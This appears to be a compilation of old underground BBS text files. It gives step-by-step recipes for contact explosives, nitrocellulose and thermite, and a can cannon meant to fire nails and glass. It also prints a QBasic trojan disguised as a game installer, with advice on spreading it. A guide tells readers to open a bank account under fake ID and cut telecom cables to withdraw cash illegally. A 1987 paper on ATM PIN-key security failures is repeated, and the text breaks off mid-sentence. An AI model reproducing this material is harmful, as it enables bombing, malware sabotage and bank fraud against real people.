pestle if available, and grind GENTLY.  Do not use plastic as this can
build a static charge.  Remember, do them SEPARATELY.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING:  This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!!  AVOID IT when dry!  DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
   This bucket will never be clean again, in all likelihood.
   Try to get clear (non-pine, non-cloudy) ammonia.  Or use an
   ammonium hydroxide solution from a chemlab.  This results in better
   but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
   preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
   the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW TO BUILD A TENNIS BALL CANNON?
1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
   make the breach)
4. The cans should overlap and be fit together to make a long barrel
   closed at one end and open at the other.

                 ___________________________________
    open -->    ()____)_____)_____)_____)_____)_____)    <--closed
    (barrel)           1     2     3     4     5     6          (breach)

5. Duct tape all of the cans together.  USE LOTS OF TAPE!!
6. Put some gunpowder in the bottom of the CANnon.
7. Aim, brace the CANnon.
8. Spray hairspray or pour alcohol on the tennis ball and light.
9. Drop the ball into the can and STAND BACK!

Other ideas:
a) Make explosive tennis balls.
b) Launch potatoes.
c) Launch thumbtacks, nails, broken glass, etc.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
(from Terrorist's Handbook)
Materials: cotton, concentrated nitric acid, concentrated sulfuric
           acid, distilled water

Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
           litmus paper

Procedure: 1.  Pour 10mL of sulfuric acid into beaker.
            2.  Pour 10mL of nitric acid into beaker with sulfuric
               acid.
           3.  Immediately add 0.5 gram of cotton.
           4.  Allow it to soak for EXACTLY three(3) minutes.
           5.  Remove the nitrocellulose.
           6.  Put the nitrocellulose into a beaker of distilled
               water to wash it in.
           7.  Allow the material to dry.
           8.  Re-wash it.
           9.  Once neutral(acid/base) it can be dried and stored.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THERMITE AND HOW DO I MAKE IT?
Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
and can be used to burn through most anything.

Materials: powdered aluminum, powdered iron oxide

Procedure: mix the two powders together as evenly as possible

Ignition:  thermite is difficult to ignite but these work
            a) mix a small amount of potassium chlorate into the
               thermite mixture and ignite with a few drops of
               sulfuric acid
            b) magnesium strip or 'sparkler' stuck into the powder
               which is then lit as a fuse

=====================================================================
V. Infection
     (Virii, Trojans, Worms and other creepy crawlies)

WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria.  [number not available - :( ]
Problem:  They demand a virus they don't have in their archives to
let you in.  Good luck finding one.  The best way is to write one,
even if it's in BASIC. It'll probably get you in.  They have
THOUSANDS of virii.  IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.

There are alot of places in the US to get virii too:
The Hell Pit in Chicago has over 1500, and they don't accept the
lame stuff like the ones written in basic, so they're all good ones.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

INTS USED:
(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer

for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
                                   0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
AH=status, AL=number of sectors written flags, carry set if an error.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

SAMPLE OF A TROJAN
(from Spear)

This is a little trojan I wrote in Qbasic 4.5  It's a bitch!

REM bitch by Spear
color 14,0
print"installing datafiles...  Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"

How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!

What does it do?
This program changes directory to the root and makes 100000 dirs in
the root.  You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md.  To get rid of them any other way you
would have to format c: or d:

-=-=-=-=-=-=-=-=-=-=-=-=-=- END of HAQ1.07/1 -=-=-=-=-=-=-=-=-=-=-=--=

                             -=*( Prophet )*=-
    ____                   __         __ 
   / __ \_________  ____  / /_  ___  / /_   The Truth Is Out There...
  / /_/ / ___/ __ \/ __ \/ __ \/ _ \/ __/
 / ____/ /  / /_/ / /_/ / / / /  __/ /_     Trust No-One...
/_/   /_/   \____/ .___/_/ /_/\___/\__/  
                /_/                         Do Not Fear The Reaper,
prophet@illumini.demon.co.uk                Fear Your God-Damn Government

Track Layouts on ATM Cards

***************  Track Layouts ************************
This is off the top of my head, but is 99% there.  Also I'll ignore
some obsolete stuff.

The physical layout of the cards are standard.  The LOGICAL makeup
varies from institution to institution.  There are some generally
followed layouts, but not mandatory.

There are actually up to three tracks on a card.

Track 1 was designed for airline use.  It contains your name and
usually your account number.  This is the track that is used when
the ATM greets you by name.  There are some glitches in how things
are ordered so occasionally you do get "Greetings Bill Smith Dr."
but such is life.  This track is also used with the new airline
auto check in (PSA, American, etc)

Track 3 is the "OFF-LINE" ATM track.  It contains such nifty
information as your daily limit, limit left, last access, account
number, and expiration date.  (And usually anything I describe in track
2).  The ATM itself could have the ability to rewrite this track to
update information.

Track 2 is the main operational track for online use.  The first thing
on track to is the PRIMARY ACCOUNT NUMBER (PAN).  This is pretty
standard for all cards, though no guarantee.  Some additional info
might be on the card such as expiration date.  One interesting item
is the PIN offset.   When an ATM verifies a PIN locally, it usually
uses an encryption scheme involving the PAN and a secret KEY.
This gives you a "NATURAL PIN" (i.e. when they mail you your pin, this
is how it got generated.)  If you want to select your own PIN, they
would put the PIN OFFSET in the clear on the card.  Just do modulo 10
arithmetic on the Natural PIN plus the offset, and you have the
selected PIN.  YOUR PIN IS NEVER IN THE CLEAR ON YOUR CARD.  Knowing
the PIN OFFSET will not give you the PIN.  This will required the
SECRET KEY.

Hope that answers your question

************ Deposits at ATMs ************************

Deposits on ATM:

Various banks have various systems.  As an example, at CITIbank
a deposit was made to a specific account.  Your account was updated
with a MEMO update, i.e. it would show up on your balance.  However
it did not become AVAILABLE funds until it was verified by a teller.
On the envelope was Customer ID number, the envelope number and
the Entered dollar amount, the branch # and the Machine #.

There was also a selection for OTHER PAYMENTS.  This allowed you to
dump any deposit into the ATM.

What are you assured then when you deposit to an ATM ?

1) You have a banking RECORD (not a reciept at Citibank).  If you
   have this record, there is a VERY high percentage that you
   deposited something at that ATM.

2) Some banks have ways of crediting your deposit RIGHT NOW.
   This could be done by a balance in another account (i.e. a long
   term C.D. or a line of credit.)  That way they can get you if
   you lied.

**************  ATM Splitting a Card in half ***************

   I've worked with about 75% of the types of machines on the market
and NONE of them split a card in half upon swallow.  However, some
NETWORKS have a policy of  slicing a card to avoid security
problems.

Trusting an ATM.
Intresting you should bring this up, I'm just brusing up a paper
describing a REAL situation where your card and PIN are in the clear.
This involves a customer using a bank that is part of a network.
All the information was available to folks in DP, if they put in some
efforts to get it.

          Mis-Implementation of an ATM PIN security system

1.  Synopsis
In an EFT (Electronic Funds Transfer) network, a single node which  does
not  implement  the  proper  security  can  have  effects throughout the
network.  In this paper, the author describes an example of how security
features  were  ignored, never-implemented, and/or incorrectly designed.
The human factors involved in the final implementation are  explored  by
showing  several major vulnerabilites caused by a Savings and Loan and a
regional EFT network's lack of vigilance in installing  an  EFT  network
node.   While  using  an  EFT  system as an example, the concepts can be
extrapolated into the implementation of other secured systems.

2.  Background
A small Savings and Loan  was  setting  up  a  small  (10  to  16  ATMs)
proprietary  Automatic  Teller  Machine (ATM) network.  This network was
then intended to link up to a regional network.  The manufacturer of the
institution's  online  banking  processor  sent an on-site programmer to
develop the required interfaces.

An ATM network consists of three main  parts.   The  first  is  the  ATM
itself.   An ATM can have a range of intelligence.  In this case the ATM
was able to decode a  PIN  (Personal  Identification  Number)  using  an
institution  supplied  DES  (Data Encryption Standard) key.  It was then
required to send a request for funds to the host where it would receive
authorization.

The second portion of the network is the ATM controller.  The controller
monitors the transaction, and routes the message  to  the  authorization
processor.   The  controller  would  also generally monitor the physical
devices and statuses of the ATM.

The third portion of the network is the authorization system.   In  this
case  customers  of  the  local  institution  would have the transaction
authorized on the same processor.  Customers  from  foreign  (i.e.   one
that  does not belong to the institution that runs the ATM) institutions
would be authorized by the regional  network.   Authorization  could  be
from  a  run-up  file which maintains establishes a limit on withdrawals
for a  given  account  during  a  given  period.   A  better  method  is
authorization direct from the institution which issued the card.

3.  Security
The system has a two component key system to allow access to the network
by the customer.  The first  is  the  physical  ATM  card  which  has  a
magnetic stripe.  The magnetic stripe contains account information.  The
second component is the Personal Identification Number (PIN).   The  PIN
is hand entered by the customer into the ATM at transaction time.  Given
these  two  parts,  the  network  will  assume  that  the  user  is  the
appropriate customer and allow the transaction to proceed.

The Magnetic stripe is in the clear and may be assume to be reproducible
using various methods, thus the PIN is crucial security.

 Security PIN security

3.1.  PIN security

3.1.1.  PIN key validation method

PINs can be linked up to a particular card in a  number  of  ways.   One
method  puts  the  PIN  into  a central data base in a one-way encrypted
format.  When a PIN is presented, it  would  be  encrypted  against  the
format  in  the  data base.  This method requires a method of encrypting
the PIN given at the ATM, until it can be verified at the central  site.
Problems  can  also  occur if the institution wants to move the PIN data
base to another processor, especially from a different computer vendor.

Another  method  is  to take information on the card, combine it with an
institution PIN encryption key (PIN key) and use that  to  generate  the
PIN.   The institution in question used the PIN key method.  This allows
the customer to be verified at the ATM itself and no transmission of the
PIN  is  required.   The  risk  of  the  system  is  the PIN key must be
maintained under the tightest of security.

The PIN key is used to generate the natural PIN.   This  is  derived  by
taking  the  account number and using DES upon it with the PIN key.  The
resulting number then is decimialized by doing a lookup on  a  16  digit
decimalization  table  to  convert  the  resulting hexadecimal digits to
decimal digits.  An ATM loaded with the appropriate  PIN  key  can  then
validate  a customer locally with no need to send PIN information to the
network, thereby reducing the risk of compromise.

The PIN key requires the utmost security.  Once the PIN  key  is  known,
any  customer's  ATM card, with corresponding PIN can be created given a
customer account number.  The ATM allows for the PIN to  be  entered  at
the  ATM  in  two parts, thus allowing each of two bank officers to know
only one half of the key.  If desired, a terminal  master  key  can  be
loaded and then the encrypted PIN key loaded from the network.

The  decimalization table usually consists of 0 to 9 and 0 to 5, ("0" to
"F" in hexadecimal where "F" = 15).  The decimalization table can be put
into any order, scrambling the digits and slowing down an attacker.  (As
a side note, it could be noted that using the "standard" table, the  PIN
digits  are  weighted  to 0 through 5, each having a 1/8 chance of being
the digit, while 6 through 9 has only a 1/16 chance.)

When handling a foreign card, (i.e.  one that does  not  belong  to  the
institution that runs the ATM), the PIN must be passed on to the network
in encrypted form.  First, however, it must be passed from  the  ATM  to
the  ATM controller.  This is accomplished by encrypting the PIN entered
at  the  ATM  using  a  communication  key  (communication   key),   The
communication  key  is  entered  at  the  ATM much like the PIN key.  In
addition, it can be downloaded from the network.  The PIN  is  decrypted
at  the controller and then reencrypted with the network's communication
key.

                                 - 2 -

Security
PIN security
PIN key validation method

Maintaining  the  the  security  of  the  foreign  PIN  is  of  critical
importance.   Given  the  foreign PIN along with the ATM card's magnetic
image, the perpetrator has access to an account  from  any  ATM  on  the
network.    This  would  make  tracking  of  potential  attackers  quite
difficult, since the ATM and the institution they extract funds from can
be  completely  different from the institution where the information was
gleaned.

Given  that  the  encrypted  PIN  goes  through   normal   communication
processes,  it  could  be  logged  on  the normal I/O logs.  Since it is
subject to such logging, the PIN in any form should be denied  from  the
logging function.

3.2.  Security Violations
While  the EFT network has potential to run in a secured mode given some
of the precautions outlined above, the potential for abuse  of  security
is  quite easy.  In the case of this system, security was compromised in
a number of ways, each leading to the potential loss of funds, and to  a
loss of confidence in the EFT system itself.

3.2.1.  Violations of the PIN key method
The  two  custodian  system simply wasn't practical when ATMs were being
installed all over the state.  Two examples show this:   When  asked  by
the  developer  for the PIN key to be entered into a test ATM, there was
first a massive search for the key, and then it was read to him over the
phone.   The  PIN  key  was  written  on  a scrap of paper which was not
secured.  This is the PIN key that all the customer PINs are  based  on,
and which compromise should require the reissue of all PINs.)

The  importance of a system to enter the PIN key by appropriate officers
of the bank should not be overlooked.  In  practice  the  ATM  installer
might  be the one asked to enter the keys into the machine.  This indeed
was demonstrated in this case where the ATM installer not only had  the
keys  for  the  Savings and Loan, but also for other institutions in the
area.  This was kept in the high security area of the  notebook  in  the
installer's front pocket.

Having  a  Master key entered into the ATM by officers of the bank might
add an additional layer of security to the system.  The actual  PIN  key
would then be loaded in encrypted form from the network.  In the example
above, if the installer was aware of the terminal master key,  he  would
have to monitor the line to derive the actual PIN key.

The  use  of  a downline encrypted key was never implemented, due to the
potential complications and added cost of such a  system.   Even  if  it
was,  once violated, security can only be regained by a complete reissue
of customer PINs with the resulting confusion ensuing.

                                 - 3 -

Security
Security Violations
Network validated PIN Security violations

3.2.2.  Network validated PIN Security violations
Given  the  potential  for untraced transactions, the maintenance of the
foreign PINs security was extremely important.  In the PIN  key  example
above,  any  violation  would  directly  affect  the  institution of the
violators.  This would limit the scope of an investigation, and  enhance
the  chance of detection and apprehension.  The violation of foreign PIN
information has a much wider sphere of attack,  with  the  corresponding
lower chance of apprehension.

The  communication  key  itself  was  never  secured.  In this case, the
developer  handed  the  key  to  the  bank  officers,  to   ensure   the
communication  key  didn't get misplaced as the PIN key did (This way he
could recall it in case it got lost).  Given the communication key,  the
security  violation  potential  is  simple enough.  The programmer could
simply  tap  the  line  between  the  ATM  and  the  controller.    This
information  could  then generate a set of PIN and card image pairs.  He
would even have account balances.

Tapping the line would have been an effort, and worse yet he  could  get
caught.   However,  having  the  I/O  logs could serve the same purpose.
While originally designed to obscure PIN information in  the  I/O  logs,
the  feature was disabled due to problems caused by the regional network
during testing.  The I/O logs would be sent to the developer  any  time
there was a problem with the ATM controller or the network interface.

The  generation of PIN and card image pairs has a potential for even the
most secured system on the network  to  be  attacked  by  the  lapse  in
security  of  a weaker node.  Neither the communication key, nor the PIN
should ever be available in the clear.  This requires  special  hardware
at  the  controller  to  store  this  information.   In  this  case, the
institution had no desire to install a  secured  box  for  storing  key
information.   The  communication key was available in software, and the
PIN was in the clear during the process of decrypting from the  ATM  and
re-encrypting  with  the network key.  Any programmer on the system with
access to the controller could put in a log file to tap off the PINs  at
that point.

The largest failure of the system, though, was not a result of the items
described above.  The largest failure in the system was in the method of
encrypting  the  PIN  before  going  to the network.  This is due to the
failure of the network to have a secured key between sites.  The PIN was
to  be  encrypted  with  a  network  key.   The  network key was sent in
encrypted form from the network to the ATM controller.  However, the key
to  decrypt  the network key was sent almost in the clear as part of the
start-of-day sequence.

Any infiltrator monitoring the  line  would  be  able  to  get  all  key
information  by  monitoring the start-of-day sequence, doing the trivial
decryption of the communication key, and proceeding to gather card image
and PIN pairs.  The infiltrator could then generate cards and attack the
system at his leisure.

                                 - 4 -

Security
Security Violations
Network validated PIN Security violations

The network-ATM controller security failure is the most critical feature
since it was defined by a regional network supporting many institutions.
The network was supposedly  in  a  better  position  to  understand  the
security requirements.

4.  The Human Factors in Security  Violation
It is important the users of a system be appraised of the procedures for
securing the system.  They should understand the risks,  and  know  what
they  are  protecting.   The  bank officers in charge of the program had
little experience with ATM systems.  They were never fully indoctrinated
in  the  consequences of a PIN key or communication key compromise.  The
officers showed great surprise when the developer was able  to  generate
PINs  for  supplied  test cards.  Given the potential risk, nothing more
was done to try to change the PIN key,  even  though,  they  were  quite
aware  that  the  PIN  key was in the developer's possession.  They once
even called the developer for the PIN key when they weren't able to find
it.

The  developer  had a desire to maintain a smooth running system and cut
down on the development time of an  already  over-budget  project.   Too
much security, for example modifying I/O logs, could delay the isolation
or repair of a problem.

The regional network was actually a marketing company who  subcontracted
out  the  data processing tasks.  They failed to recognized the security
problem of sending key information with extremely weak encryption.   The
keys  were  all but sent in the clear.  There seemed to be a belief that
the use of encryption in and of itself caused a network to  be  secured.
The  use  of DES with an unsecured communication key gave the appearance
of a secured link.

The lack of audits of the system, both in design and implementation  was
the  final security defect which allowed the system to be compromised in
so many ways.  An example of the Savings and Loan's  internal  auditors
failure  to  understand  the problems or technology is when the auditors
insisted that no contract developers would be  allowed  physically  into
the  computer room.  The fact was, access to the computer room was never
required to perform any of the described violations.

5.  Security Corrections
As in any system where security was required, the time to  implement  it
is  at  the  beginning.  This requires the review of both implementation
ormed  to
verify  that  the  procedures  are  followed  as  described in the plan.
Financing, scheduling and man power for such audits must be allocated so
security issues can be addressed.

For this institution, the first step would have been to indoctrinate the

                                 - 5 -

Security Corrections

banking  officers  of  the risks in the ATM network, the vulnerabilites,
and the security measures required.

Custodians  of  all  keys should be well aware of their responsibilities
for those keys.  A fall back system of key recovery must be in place  in
case an officer is not available for key entry.

The  cost  of installing hardware encryption units at the host should be
included in the cost of putting in the  system.   The  host  unit  could
generate  down-line  keys for both the PIN key and the communication key
thus making it more difficult to derive  these  keys  without  collusion
from at least three people.

A  secured  communications key should be established between the Network
and the institution.  This would  allow  for  the  exchange  of  working
communication  keys.   This  key  should  be  changed  with a reasonable
frequency.

All these areas should be audited in both the system  specification  and
implementation  to  make sure they are not being abridged in the name of
expediency.

6.  Summary
In this view of a single  institution,  a  number  of  failures  in  the
security  system  were  shown.   There  was  shown a definite failure to
appreciate what was required in the way of security for  PINs  and  keys
used  to  derive  PIN  information.   An avoidance of up front costs for
security lead to potentially higher cost in the future.   The  key  area
was the lack of audits of the EFT system by both the institution and the
network, causing potential loss to all institutions on the network.

                                 - 6 -

For those of you who would like a deeper view of thes of ATM
PIN stuff, I'm merging some previous postings along with a paper

Downloaded from Just Say Yes. 2 lines, More than 500 files online!
         Full access on first call. 415-922-2008 CASFA

Hacking ATMs, by Anonymous

                +     -->  HACKING ATM'S  <--      +

   Welcome everybody to my first article dealing with the manipulation of the
   Bank's Automated Teller Machines for the gain of money..
   In this article I will show you many ways to 'beat' the system. Some methods
   of hacking into ATM's are very easy and others are a bit more difficult.
   I suggest you pick the method that mostly suits you.
   Okay Lets get straight into it....
1.0     Different types of Automatic Tellers
============================================
There are 3 major types of Automatic teller machines.
IBM
===
The first of these (and the most popular) is the IBM model. This is easily
distinguised from the others by the IBM logo in the top right hand corner of
the front of the machine.
This unit features a touch sensitive keypad and a 1 line display with a visor
that moves up and down. (The newer models have a 5 line display)..
NCR
===
The second unit is the NCR unit, which is MUCH smaller than than the IBM front
panel. This unit has a small VDU as well as a touch sensitive keypad. The only
banks that seem to be using this unit in Australia is the 'STATE BANK' of
Victoria, so you will not see many of them around.
PHILIPS
=======
The third and final unit is made by Philips as is only used by the credit
unions or Building Societys. This is usually known as 'CASHCARD'. These units
feature a push-button keyboard and a VDU (like the NCR).
All these above units provide the same functions...  

1.1   Information on the Plastic Cards
======================================
The Plastic Cards that you put into these cash carrying monsters have a Number
that is printed on the front of the card (which is also the same number, that
is stored on the MAGNETIC STRIP on the back of the card.)
What do these numbers mean????? 
Well here is some information on them...
The Numbers are split up into 2 groups, the first group ALWAYS contains
SIX numbers while the second group contains anywhere between 6 to 13 
numbers.
EG)         560192 3012565214782
            \ /\ /
             |  |__ This 3 digit number identifies the Bank.    
             |
             |__ This is the Australian ID code and ALL banks have this.
   Some ID's for banks
   ===================
         192   -  Westpac Banking Corporation
         251   -  National Australia Bank
         220   -  Commenwealth Bank
The Second part of the number seems to be a jumble of digits for 6 to 13, which
only seem to make sense to the banks computer.
The banks computer simply looks the second number up in a Table and finds out
your assigned PIN number (A password for your card consisting of 4 digits), 
and any other information. eg) Your savings account no. Cheque a/c etc.
Since the four Digit PIN (Personal Identification Numbers) range from 0000 to
9999, then more than one person has the same PIN number for his card. (Banks do
have more that 10,000 customers !!)
Okay now that we have some simple background information we can learn how to
'defeat' the system..
1.2   The "CABLE CUTTER METHOD"
===============================
For this method you will require the Follwing:
  (1) -  Guts
  (2) -  Good Pair of SIDCHROME cutters
  (3) -  Fake ID (library cards, Concession Cards etc.)
Okay the First Step is to open up a bank savings account at one of the banks
that gives you access to the ATM..
The Major banks have the following Packages:
   Westpac  - Advantage Saver
   National - Flexi Card
   C'wealth - Key Card
I suggest you go for National Bank as their limit is $500 per day, where
Westpac has a $200 Max Limit per day..
Give them an address where you can check the mail everyday (so you can receive
your card and PIN number)...An old house etc. will do very well.
Make sure you open the account at a 'small' suburb branch, that has computer
equipment installed.
Once you have finally received your brand new savings account with fake name
and addreYour account record is kept at your branches computer. So what the main
computer does is get in touch with the branches (on the network) and ask it
information on your account. (Balance etc.).
Ok so what do we do with the cutters??? Well go to your banks branch (at about
10.00 - 11.00 pm), Find the Concrete Telecom cover near the bank and lift it
off using the handle of the Cutters. 
Ok, See if there are cables leading from the main tube into a smaller tube that
leads underground into the bank...Well take your cutters and snip them..Ok well
congratulations you have just cut the phone cables for all their phones and
their branch computer system..
If you wanna be a bit more sure that you cut the cable to the computer, Snip
every cable in sight of the bank. (Use insulated cutters and don't be afraid of
the sparks and mini fire works.)
Ok the banks compuer should be disabled now, so go to the nearest ATM you can
find and pop your card in and try to do a ' ACCOUNT BALANCE '. You should get a
NOT AVAILABLE - try again Later ERROR..If you do then start jumping up and
down cause you have done it!!
You see the main computer is programmed to give you whatever money you ask for
when the lines are down, so they will not inconvenience the customers. So punch
in the max. LIMIT any time before 12 midnight and then take out another batch
after 12.00 midnight (or whatever other time you can)..
When they Fix the Lines, the main computer will update the balance in the
branches computer... (he he). Your account will have a Debit Balance and the
bank manager will come after you..But he won't find you will he!!
The major banks that to use this new system are:  Westpac and National.
I have tried it with both banks and it works great. Although I prefer National
Bank since you can make $1,000 in a few minutes.

ATM secret codes, from Fred Gindburg (July 10, 1987)

From ames!amdahl!nsc!voder!wlbr!gins Mon Jul 13 12:41:23 PDT 1987
Article 479 of sci.crypt:
Path: ames!amdahl!nsc!voder!wlbr!gins
>From: gins@wlbr.UUCP (Fred Ginsburg)
Newsgroups: sci.crypt
Subject: Re: ATM secret codes
Summary: ATM stuff
 LONG...
Message-ID: <1038@wlbr.UUCP>
Date: 10 Jul 87 18:29:09 GMT
Organization: Eaton IMS, Westlake Village, CA
Lines: 445

A
In article <548@l.cc.purdue.edu>, roz@l.cc.purdue.edu (Vu Qui Hao-Nhien) writes:
> In article <127@ddsw1.UUCP> karl@ddsw1.UUCP (Karl Denninger) writes:
> >In article <192@sugar.UUCP>, karl@sugar.UUCP (Karl Lehenbauer) writes:
> 
> The transactions done by ATM sometimes (not always) are kept by the
> machine until remove by human hands and fed to the bank's computer at
> its headquarters.  Hence not much communication between ATM and the
> outside world.
> -- 

For those of you who would like a deeper view of the wonders of ATM
PIN stuff, I'm merging some previous postings along with a paper
on computer security.  Any questions, give a call (818-706-4146)

or send to {trwrb,ihnp4}!wlbr!gins 

***************  Track Layouts ************************

This is off the top of my head, but is 99% there.  Also I'll ignore
some obsolete stuff.

The physical layout of the cards are standard.  The LOGICAL makeup
varies from institution to institution.  There are some generally
followed layouts, but not mandatory.

There are actually up to three tracks on a card.

Track 1 was designed for airline use.  It contains your name and
usually your account number.  This is the track that is used when
the ATM greets you by name.  There are some glitches in how things
are ordered so occasionally you do get "Greetings Bill Smith Dr."
but such is life.  This track is also used with the new airline
auto check in (PSA, American, etc)

Track 3 is the "OFF-LINE" ATM track.  It contains [email protected]
information as your daily limit, limit left, last access, account
number, and expiration date.  (And usually anything I describe in track
2).  The ATM itself could have the ability to rewrite this track to
update information.

Track 2 is the main operational track for online use.  The first thing
on track to is the PRIMARY ACCOUNT NUMBER (PAN).  This is pretty
standard for all cards, though no guarantee.  Some additional info
might be on the card such as expiration date.  One interesting item
is the PIN offset.   When an ATM verifies a PIN locally, it usually
uses an encryption scheme involving the PAN and a secret KEY.
This gives you a "NATURAL PIN" (i.e. when they mail you your pin, this
is how it got generated.)  If you want to select your own PIN, they
would put the PIN OFFSET in the clear on the card.  Just do modulo 10
arithmetic on the Natural PIN plus the offset, and you have the
selected PIN.  YOUR PIN IS NEVER IN THE CLEAR ON YOUR CARD.  Knowing
the PIN OFFSET will not give you the PIN.  This will required the
SECRET KEY.

Hope that answers your question

************ Deposits at ATMs ************************

Deposits on ATM:

Various banks have various systems.  As an example, at CITIbank
a deposit was made to a specific account.  Your account was updated
with a MEMO update, i.e. it would show up on your balance.  However
it did not become AVAILABLE funds until it was verified by a teller.
On the envelope was Customer ID number, the envelope number and
the Entered dollar amount, the branch # and the Machine #.

There was also a selection for OTHER PAYMENTS.  This allowed you to
dump any deposit into the ATM.

What are you assured then when you deposit to an ATM ?

1) You have a banking RECORD (not a reciept at Citibank).  If you
   have this record, there is a VERY high percentage that you
   deposited something at that ATM.

2) Some banks have ways of crediting your deposit RIGHT NOW.
   This could be done by a balance in another account (i.e. a long
   term C.D. or a line of credit.)  That way they can get you if
   you lied.

**************  ATM Splitting a Card in half ***************

   I've worked with about 75% of the types of machines on the market
and NONE of them split a card in half upon swallow.  However, some
NETWORKS have a policy of  slicing a card to avoid security
problems.

Trusting an ATM.
Intresting you should bring this up, I'm just brusing up a paper
describing a REAL situation where your card and PIN are in the clear.
This involves a customer using a bank that is part of a network.
All the information was available to folks in DP, if they put in some
efforts to get it.

          Mis-Implementation of an ATM PIN security system

1.  Synopsis
In an EFT (Electronic Funds Transfer) network, a single node which  does
not  implement  the  proper  security  can  have  effects throughout the
network.  In this paper, the author describes an example of how security
features  were  ignored, never-implemented, and/or incorrectly designed.
The human factors involved in the final implementation are  explored  by
showing  several major vulnerabilites caused by a Savings and Loan and a
regional EFT network's lack of vigilance in installing  an  EFT  network
node.   While  using  an  EFT  system as an example, the concepts can be
extrapolated into the implementation of other secured systems.

2.  Background
A small Savings and Loan  was  setting  up  a  small  (10  to  16  ATMs)
proprietary  Automatic  Teller  Machine (ATM) network.  This network was
then intended to link up to a regional network.  The manufacturer of the
institution's  online  banking  processor  sent an on-site programmer to
develop the required interfaces.

An ATM network consists of three main  parts.   The  first  is  the  ATM
itself.   An ATM can have a range of intelligence.  In this case the ATM
was able to decode a  PIN  (Personal  Identification  Number)  using  an
institution  supplied  DES  (Data Encryption Standard) key.  It was then
required to send a request for funds to the host where it would receive
authorization.

The second portion of the network is the ATM controller.  The controller
monitors the transaction, and routes the message  to  the  authorization
processor.   The  controller  would  also generally monitor the physical
devices and statuses of the ATM.

The third portion of the network is the authorization system.   In  this
case  customers  of  the  local  institution  would have the transaction
authorized on the same processor.  Customers  from  foreign  (i.e.   one
that  does not belong to the institution that runs the ATM) institutions
would be authorized by the regional  network.   Authorization  could  be
from  a  run-up  file which maintains establishes a limit on withdrawals
for a  given  account  during  a  given  period.   A  better  method  is
authorization direct from the institution which issued the card.

3.  Security
The system has a two component key system to allow access to the network
by the customer.  The first  is  the  physical  ATM  card  which  has  a
magnetic stripe.  The magnetic stripe contains account information.  The
second component is the Personal Identification Number (PIN).   The  PIN
is hand entered by the customer into the ATM at transaction time.  Given
these  two  parts,  the  network  will  assume  that  the  user  is  the
appropriate customer and allow the transaction to proceed.

The Magnetic stripe is in the clear and may be assume to be reproducible
using various methods, thus the PIN is crucial security.

Security
PIN security

3.1.  PIN security

3.1.1.  PIN key validation method

PINs can be linked up to a particular card in a  number  of  ways.   One
method  puts  the  PIN  into  a central data base in a one-way encrypted
format.  When a PIN is presented, it  would  be  encrypted  against  the
format  in  the  data base.  This method requires a method of encrypting
the PIN given at the ATM, until it can be verified at the central  site.
Problems  can  also  occur if the institution wants to move the PIN data
base to another processor, especially from a different computer vendor.

Another  method  is  to take information on the card, combine it with an
institution PIN encryption key (PIN key) and use that  to  generate  the
PIN.   The institution in question used the PIN key method.  This allows
the customer to be verified at the ATM itself and no transmission of the
PIN  is  required.   The  risk  of  the  system  is  the PIN key must be
maintained under the tightest of security.

The PIN key is used to generate the natural PIN.   This  is  derived  by
taking  the  account number and using DES upon it with the PIN key.  The
resulting number then is decimialized by doing a lookup on  a  16  digit
decimalization  table  to  convert  the  resulting hexadecimal digits to
decimal digits.  An ATM loaded with the appropriate  PIN  key  can  then
validate  a customer locally with no need to send PIN information to the
network, thereby reducing the risk of compromise.

The PIN key requires the utmost security.  Once the PIN  key  is  known,
any  customer's  ATM card, with corresponding PIN can be created given a
customer account number.  The ATM allows for the PIN to  be  entered  at
the  ATM  in  two parts, thus allowing each of two bank officers to know
only one half of the key.  If desired, a terminal  master  key  can  be
loaded and then the encrypted PIN key loaded from the network.

The  decimalization table usually consists of 0 to 9 and 0 to 5, ("0" to
"F" in hexadecimal where "F" = 15).  The decimalization table can be put
